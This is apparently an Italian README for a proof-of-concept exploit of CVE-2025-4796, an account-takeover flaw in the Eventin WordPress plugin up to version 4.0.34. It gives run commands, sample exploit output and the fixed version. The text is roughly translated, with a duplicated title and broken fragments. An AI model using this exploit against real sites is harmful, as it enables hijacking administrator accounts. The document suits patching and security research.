
eventin <= 4.0.34 - escalation dei privilegi tramite cambio email dell'utente / acquisizione dell'account per contributore+ autenticato
eventin <= 4.0.34 - escalatione dei privilegi tramite modifica dell'email utente / acquisizione dell'account per contributor+ autenticati
Bug di escalation dei privilegi nel plugin eventin per WordPress (<= 4.0.34) che consente a qualsiasi utente contributor o superiore di modificare l'email di qualsiasi utente tramite l'API di aggiornamento degli speaker del plugin. Modificando l'email di un amministratore con una controllata dall'attaccante, questi può resettare la password e impossessarsi dell'account.
eventin\speaker\api\speakercontroller::update_item)eventin non controlla correttamente chi richiede l'aggiornamento né se può modificare l'email dell'utente. Un contributor o superiore può chiamare questo endpoint:
installare requests:
pip install requests
Esegui lo script e inserisci i valori richiesti quando richiesto:
python3 CVE-2025-4796.py
[+] disattivazione degli avvisi di verifica SSL
[+] accesso a WordPress.
[+] accesso riuscito.
[+] ottenimento del token nonce
[+] token nonce trovato: abcdef1234567890
[+] richiesta di aggiornamento per l'email dello speaker
[+] operazione di aggiornamento riuscita.
url: http://example.com
id: 123
email: [email protected].
user: attacker
pass: yourpassword
{.
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}.
La patch è stata rilasciata nella versione 4.0.35 del plugin eventin. Si consiglia vivamente agli amministratori del sito di aggiornare immediatamente a questa versione. La correzione include controlli aggiuntivi di validazione dell'utente nella funzione SpeakerController::update_item